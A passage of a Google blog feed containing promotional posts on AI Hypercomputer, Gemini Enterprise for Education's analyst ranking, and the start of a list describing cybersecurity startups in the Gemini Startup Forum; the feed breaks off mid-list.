&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get more performance per dollar on AI Hypercomputer &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As your infrastructure investment grows, you need to balance raw performance and cost to make AI applications economically viable. Taking a ‘buy now, integrate later’ approach to AI is becoming unsustainable. By combining pre-integrated hardware and open software frameworks that feature flexible consumption models, we deliver a unified system engineered for better performance per dollar across training, reinforcement learning, and inference.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Gartner recognized our integrated AI Hypercomputer as a core strength. This AI-optimized infrastructure is engineered to drastically improve your performance per dollar:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A massive compute cluster is only as effective as the storage system feeding it data. Google Cloud Managed Lustre, powered by our new C4NX instances and Hyperdisk Exapools, now delivers 10 TB/s of bandwidth — up to 20x faster than other hyperscalers — while Rapid Buckets transforms object storage with up to 20 million operations per second, helping ensuring large-scale training checkpoints and recoveries happen near-instantly.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our Virgo Network provides a high-bandwidth scale-out fabric capable of connecting &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;more than one million TPUs &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;across multiple data center sites into a training cluster, or &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;up to 960,000 GPUs&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; across multiple sites without performance degradation — transforming  globally distributed infrastructure into a unified supercomputer.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GKE Inference Gateway enables scaling models in production with near-zero latency by combining LLM-aware routing, caching, and the disaggregated serving capabilities of llm-d, increasing throughput by up to 40% while reducing serving costs up to 30%.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Run AI on a fluid infrastructure at virtually any scale&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In the agentic era, infrastructure cannot be a rigid, static constraint. It must be an intelligent resource that adapts to the shifting priorities of your business, scaling up with demand and down to zero when agents are idle, with consistent, reliable performance. On AI Hypercomputer, you can:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Train smarter and faster, &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;using Cluster Director and Google Kubernetes Engine to scale up to 130,000 nodes. At the same time, squeeze up to 97% productivity (Goodput) out of every accelerator using TPU 8t together with software co-designed with Google DeepMind and integrated open-source frameworks — from JAX to Pathways and Pallas.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Enable secure, low latency agent execution with GKE Agent Sandbox.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Because agents need to scale, GKE Agent Sandbox can sense agent bursts and respond rapidly — provisioning up to 300 sandboxes per second per cluster, then instantly scale back when agents sit idle, optimizing compute costs.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Run distributed enterprise and AI workloads consistently across multicloud, edge, and on premises environments&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; with Cross-Cloud Network and Cloud WAN. This approach delivers low-latency, policy-driven connectivity across Google’s private global backbone spanning over 10+ million kilometers of fiber and over 200 countries and territories, with up to 40% higher performance than public internet routing.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Take the next steps on your journey with AI Hypercomputer&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;From frontier models, to billion user applications, &lt;/span&gt;&lt;a href="https://cloud.google.com/ai-infrastructure"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AI Hypercomputer&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; gives you the purpose-built hardware, open software, and flexible consumption models you need to improve AI performance, cost, and developer productivity. We are honored to see decades of experience building scalable, affordable and reliable AI systems rewarded with a leadership position in Gartner’s research.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can download a complimentary copy of the &lt;/span&gt;&lt;a href="https://cloud.google.com/resources/content/2026-gartner-mq-ai-infrastructure"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;2026 Gartner Magic Quadrant™ for AI Infrastructure&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; on our website.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/ai-infrastructure/google-is-a-leader-in-gartner-magic-quadrant-for-ai-infra" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-08T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/gemini/coffee-shop-gemini-features</id>
    <title>3 ways this coffee shop is growing with Gemini</title>
    <updated>2026-07-08T16:00:00+00:00</updated>
    <content type="html">2 men standing outside Henry's House of Coffee</content>
    <link href="https://blog.google/products-and-platforms/products/gemini/coffee-shop-gemini-features" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-08T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/public-sector/gemini-enterprise-for-education-named-a-commander-in-tambellini-starchart-2026-ai-agents-for-administrative-efficiencyagent-platforms</id>
    <title>Gemini Enterprise for Education named a Commander in Tambellini StarChart™: 2026 AI Agents for Administrative Efficiency—Agent Platforms</title>
    <updated>2026-07-08T15:14:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph"&gt;&lt;p&gt;The agentic AI era is here, transforming how higher education institutions innovate, operate, and fundamentally empower learners, faculty, and researchers. AI agents can deliver unprecedented efficiency, academic innovation, and mission effectiveness as institutions seek to diversify pedagogy, accelerate research, and automate campus operations.&lt;/p&gt;&lt;p&gt;That’s why we are proud to share that &lt;a href="https://www.thetambellinigroup.com/?utm_source=google&amp;amp;utm_term=&amp;amp;utm_campaign=da_pmax_subscription&amp;amp;utm_content=&amp;amp;utm_medium=cpc&amp;amp;gad_source=1&amp;amp;gad_campaignid=23260108229&amp;amp;gbraid=0AAAAAqb0X2pozer6ABLsKqeVhsVl3J4S-&amp;amp;gclid=Cj0KCQjw1ZjOBhCmARIsADDuFTAOnUYdYf8Sq9dtoIvdrpw5XAWNXOQxwT5vPwHUbkP0QxoBgJYZoJoaAufhEALw_wcB" target="_blank"&gt;The Tambellini Group&lt;/a&gt; has named Gemini Enterprise for Education a Commander, the report’s highest category, in the &lt;a href="https://cloud.google.com/resources/content/tambellini-starchart-ai-agent-platforms?e=48754805&amp;amp;hl=en"&gt;Tambellini StarChart™: 2026 AI Agents for Administrative Efficiency—Agent Platforms&lt;/a&gt;, ranking first in innovation and usability. We believe this recognition underscores Google’s AI leadership position in the market, performant Gemini models, and agentic platform that is already being used to strengthen student support and drive new efficiencies across higher education.&lt;/p&gt;&lt;p&gt;The Tambellini StarChart states: "Gemini Enterprise for Education is differentiated by how much it brings together in one place. It combines Gemini models, agent-building tools, enterprise search, governance controls, and Google Cloud infrastructure in a single environment. For institutions that do not want to manage a mix of disparate tools, this creates a clearer path to building and managing AI services at scale."&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Tambellini StarChart 2026 Agent Platforms chart social" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Tambellini_StarChart_2026_Agent_Platforms_.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Source: “StarChart™: 2026 AI Agents for Administrative Efficiency—Agent Platforms,” By Alpha Hamadou Ibrahim, PhD, April 2026&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p&gt;&lt;b&gt;Drive impact with Gemini Enterprise for Education&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Gemini Enterprise for Education brings together the best of Google’s AI-optimized cloud services, industry-leading Gemini models, and agentic solutions. It is a seamlessly integrated solution designed from the ground up for AI, built upon three core strengths:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;A flexible, unifying foundation built on the Google Cloud stack:&lt;/b&gt; Gemini Enterprise for Education stands out because of the unmatched breadth of the surrounding Google Cloud stack. While many campuses are currently limited by siloed, single-task AI applications, Google’s platform enables institutions to establish a custom, unified architecture. In our view, this aligns with the report’s finding that Gemini Enterprise for Education "&lt;i&gt;is best understood as part of a broader cloud AI environment rather than as a single packaged higher education application&lt;/i&gt;." By providing this holistic environment, the report notes that the platform offers "&lt;i&gt;a familiar foundation for building conversational and agent-based services that can work across different interfaces, data types, and connected systems.&lt;/i&gt;" We think this foundation gives institutions complete control to shape how agents are designed, integrated, and deployed across their campus.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Automating complex campus operations to shift focus to strategic oversight:&lt;/b&gt; Leveraging this flexible architecture, Gemini Enterprise for Education empowers institutions to handle complex administrative workflows and unify campus intelligence. By taking on multi-step tasks, AI agents allow institutions to shift their focus from manual administrative work to strategic oversight. We believe this is supported by the report’s analysis that the platform "&lt;i&gt;can support administrative use cases such as advising, student support, and service operations&lt;/i&gt;" to "&lt;i&gt;administrative efficiency across business, academic, and research operations&lt;/i&gt;." Tambellini also states that "&lt;i&gt;simpler agents can be created through no-code tools, while more advanced use cases can be built through the Agent Development Kit and Agent Runtime&lt;/i&gt;," which we believe highlights the technical versatility of the platform, allowing campuses to easily design tailored solutions.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Empowering the entire campus with secure, governed AI agents:&lt;/b&gt; Beyond administrative efficiency, Gemini Enterprise for Education serves as the new front door to agentic AI for every student, faculty member, and researcher. Users are empowered to trade manual busywork for breakthroughs by deploying custom agents that provide 24/7 adaptive support for the academic journey. In our view, this is validated by Tambellini's focus on the platform’s connection to institutional data, stating that "&lt;i&gt;agents can be grounded in sources such as productivity tools, content repositories, databases, and data platforms like BigQuery&lt;/i&gt;" and that features like "&lt;i&gt;enterprise search and Deep Research extend this further by helping users find and synthesize information across connected internal sources&lt;/i&gt;." Crucially, as this technology scales, institutions are able to maintain trust. As the report highlights, "&lt;i&gt;administrative controls, permission inheritance, role-based access, logging, and Model Armor help institutions manage access, oversight, and data protection within the same environment&lt;/i&gt;."&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;We believe our Commander placement in the Tambellini StarChart validates a decade plus of investments in AI, security and cloud to drive innovation and impact across teaching, learning and research.&lt;/p&gt;&lt;p&gt;&lt;b&gt;Transforming campus operations&lt;/b&gt;&lt;/p&gt;&lt;p&gt;We are driving real-world impact across academia, helping them achieve enhanced operations and strategic progress. From automating complex campus workflows to advancing AI-enabled learning, our customers are seeing measurable benefits:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="https://cloud.google.com/customers/uc-riverside?e=48754805&amp;amp;hl=en"&gt;&lt;b&gt;UC Riverside&lt;/b&gt;&lt;/a&gt;&lt;b&gt;:&lt;/b&gt; UC Riverside implemented Gemini Enterprise for Education to provide a unified portal for agent experiences across its entire campus community of 25,000 students, faculty, and staff. For the personnel driving the university's mission, the focus is on augmentation. By using Google AI as a force multiplier, the ITS team is transforming how the university operates.&lt;/li&gt;&lt;li&gt;&lt;a href="https://www.purdue.edu/newsroom/2026/Q1/purdue-and-google-public-sector-partner-to-scale-ai-integration-and-accelerate-education-and-research-across-the-institution/" target="_blank"&gt;&lt;b&gt;Purdue University&lt;/b&gt;&lt;/a&gt;&lt;b&gt;:&lt;/b&gt; Purdue's broad AI strategy is centered on five core areas: learning with, learning about, researching, using, and partnering in AI. Google Cloud provides the flexible, AI-optimized tech stack needed to support this entire spectrum. Additionally, the platform, coupled with the creation of the new Google AI Hub space, is helping Purdue foster hands-on collaboration, automate campus operations, and advance AI-enabled education.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;b&gt;Build the agentic future with us&lt;/b&gt;&lt;/p&gt;&lt;p&gt;As higher education continues to evolve, agentic AI offers a path toward more resilient, efficient, and student-centered institutions. To explore how these capabilities are being evaluated across the sector and learn more about Google’s position as a Commander in the administrative efficiency category, &lt;a href="https://cloud.google.com/resources/content/tambellini-starchart-ai-agent-platforms?e=48754805&amp;amp;hl=en"&gt;download the report excerpt&lt;/a&gt; from The Tambellini Group.&lt;/p&gt;&lt;p&gt;&lt;b&gt;Join us at the Higher Education Leader Series&lt;/b&gt;&lt;/p&gt;&lt;p&gt;We invite you to join fellow leaders and trailblazers at Google for Education’s Higher Education Leader Series to explore how technology and human-centric design come together to transform the university experience. We are hosting this event in Sunnyvale, CA, on July 16, and New York, NY, on July 30. Register &lt;a href="https://rsvp.withgoogle.com/events/els-high-ed-2026-northam/home" target="_blank"&gt;here&lt;/a&gt; to secure your spot.&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/public-sector/gemini-enterprise-for-education-named-a-commander-in-tambellini-starchart-2026-ai-agents-for-administrative-efficiencyagent-platforms" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-08T15:14:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/meet-the-33-cybersecurity-startups-joining-the-gemini-startup-forum</id>
    <title>Meet the 33 cybersecurity startups joining the Gemini Startup Forum</title>
    <updated>2026-07-08T13:30:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Startups are at the forefront of tackling some of the world’s most complex challenges, especially in cybersecurity, where new ideas and adaptability are always needed. These companies are embracing AI as a powerful tool, enabling them to scale their impact. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google believes that enabling the next generation of AI-native cybersecurity startups will have a positive impact across the globe. Today, we are thrilled to announce that our flagship Google for Startups program, &lt;/span&gt;&lt;a href="https://startup.google.com/programs/gemini-startup-forum/cyber-security/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Startup Forum: Cybersecurity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, has selected its first 33 trailblazing startups. This exclusive forum is designed to address critical domains and foster deep dialogue on AI integration in cybersecurity. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Every startup will be able to work on their roadmap alongside AI and cybersecurity specialists from Google DeepMind, Google Cloud, and Wiz. This year’s cohort is organized into six specialized focus areas, from autonomous agent protection to post-quantum cryptography.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;AI agent security and governance&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://capsule.security/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Capsule Security&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (Israel)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Delivers runtime protection and behavioral monitoring for autonomous AI agents. The platform tracks agent activities, API calls, and tool usage in real-time to prevent unauthorized actions and data exfiltration across software-as-a-service (SaaS) and endpoint agents.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://evokesecurity.com/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Evoke Security&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (United States)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Functions as an endpoint detection and response (EDR) platform designed for AI agents. It deploys an endpoint sensor to scan for risky agent configurations, monitor runtime behavior, and block unauthorized skill executions.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://www.manifold.security/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Manifold Security&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (United States)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Provides agentless detection and response for AI agents using graph analysis and runtime monitoring. By tapping into open telemetry and API hooks, the platform maps agent behavior and connections to identify anomalies without installing software on local machines.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://mirrorsecurity.io" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Mirror Security&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (Ireland)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Specializes in data-in-use protection for AI workloads using fully homomorphic encryption. The platform enables enterprises to perform model inference, database searches, and agent communications directly on encrypted data without decrypting it.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://onyx.security/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Onyx Security&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (Israel)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Offers an AI control plane to discover, govern, and monitor autonomous AI agents across enterprise environments. The platform analyzes agent posture, tracks session token streams, and uses a model mesh to enforce context-aware compliance policies.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://www.refractal-ai.com/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Refractal&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (United Kingdom)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Builds runtime security and governance, risk, and compliance (GRC) infrastructure to monitor and govern enterprise AI agents. It intercepts agent actions, evaluates them against organizational policies and European regulations, and generates cryptographic audit logs.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://getunbound.ai/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Unbound Security&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (United States)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Acts as an agent access security broker (AASB) that provides visibility and governance for developer-focused coding agents. It deploys endpoint hooks to monitor terminal commands and restricts agent actions based on user identity and group permissions.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://xor.tech/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;XOR&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (United States)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Produces reinforcement learning training data and environments to help AI models autonomously find and fix their own security flaws. The company provides verified task trajectories and benchmarks that developers use to train secure coding agents.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Application security and vulnerability management&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="http://aisy.ai" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Aisy&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (United Kingdom)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Models enterprise environments from an attacker's perspective to prioritize vulnerability remediation. The platform maps external attack surfaces, groups related assets into business-centered threat models, and identifies critical exploit chains.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://altsec.io" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Alt Security&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (Israel)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Develops an agentic penetration testing platform that uses autonomous AI agents to perform security testing. The system automates reconnaissance, chains vulnerability findings to identify critical business risks, and validates exploits in sandboxed environments.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://arcjet.com" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Arcjet&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (United States)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Provides application security that executes natively inside developer codebases via an SDK. The platform handles bot detection, rate limiting, and prompt injection directly in the codebase, maintaining a low-latency decision loop.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://www.pixee.ai" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Pixee&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (United States)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Automates vulnerability triage and code remediation by converting scanner results into verified pull requests. The platform uses a context graph and a deterministic harness to generate codebase-compatible fixes that pass developer continuous integration (CI) pipelines.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud, network, and infrastructure security&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://www.cloudfence.com/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;CloudFence&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (United States)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Monitors a company's cloud network like an invisible overhead drone. It studies the normal patterns of how systems talk to each other and immediately alerts managers if a system starts talking to an unfamiliar location.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cyberseq.io/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;CyberSeQ&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (United Kingdom)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Scans software code and digital pipelines to check if their encryption is outdated. It helps organizations plan their transition to modern, quantum-proof security keys.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://huskeys.io/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Huskeys&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (Israel)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Works as a smart tuner for a company's digital firewall. It automatically optimizes and adapts traffic filters in real-time, reducing false alarms so legitimate customers can visit websites without being blocked.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://native.security" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Native&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (Israel)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Serves as a multicloud security control plane that manages built-in native provider controls across Google Cloud, AWS, Azure, and Oracle. The platform uses a simulation engine to preview the operational impact of security policy changes before deployment.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://prowler.com" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Prowler&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (United States)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Automates cloud security posture management and compliance checks across multicloud environments. The open-source platform uses a database of community-driven security controls to identify and remediate misconfigurations.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://qizsecurity.com/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;QIZ Security&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (Israel)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Manages enterprise cryptographic assets and compliance posture through a centralized dashboard. The platform maps certificates, databases, and source code into a knowledge graph to help organizations transition to post-quantum cryptography.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://tracebit.com" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Tracebit&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (United Kingdom)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Uses cloud-native decoys, or canaries, to detect infrastructure intrusions and unauthorized access. The platform deploys these decoy resources at scale via infrastructure-as-code to trigger alerts the moment an attacker moves.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Endpoint security and data protection&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://www.bold.security" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Bold Security&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (United States)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Provides a user-space endpoint security agent that protects enterprise devices from data exfiltration and insider threats. The agent runs local classification models on-device, allowing for policy enforcement and data loss prevention without cloud latency.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://www.glow.io/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Glow&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (Israel)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Unifies endpoint, software, and AI agent monitoring into a single workspace protection layer. By using a team of collaborative AI agents, the platform maps organization-wide software footprints and blocks unauthorized browser extensions and plugins.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://www.jazz.security/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Jazz&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (United States)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Modernizes data loss prevention (DLP) by analyzing user intent and business context rather than relying on static pattern rules. It uses a lightweight endpoint agent and an intelligent investigator to automatically triage and resolve data-flow alerts.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://orionsec.io" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;ORION Security&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (United States)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Deploys an indicator-driven data loss prevention platform that tracks data lineage across endpoints, browsers, and SaaS tools. By mapping file movements in a graph database, the platform identifies exfiltration risks without requiring manual policies.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
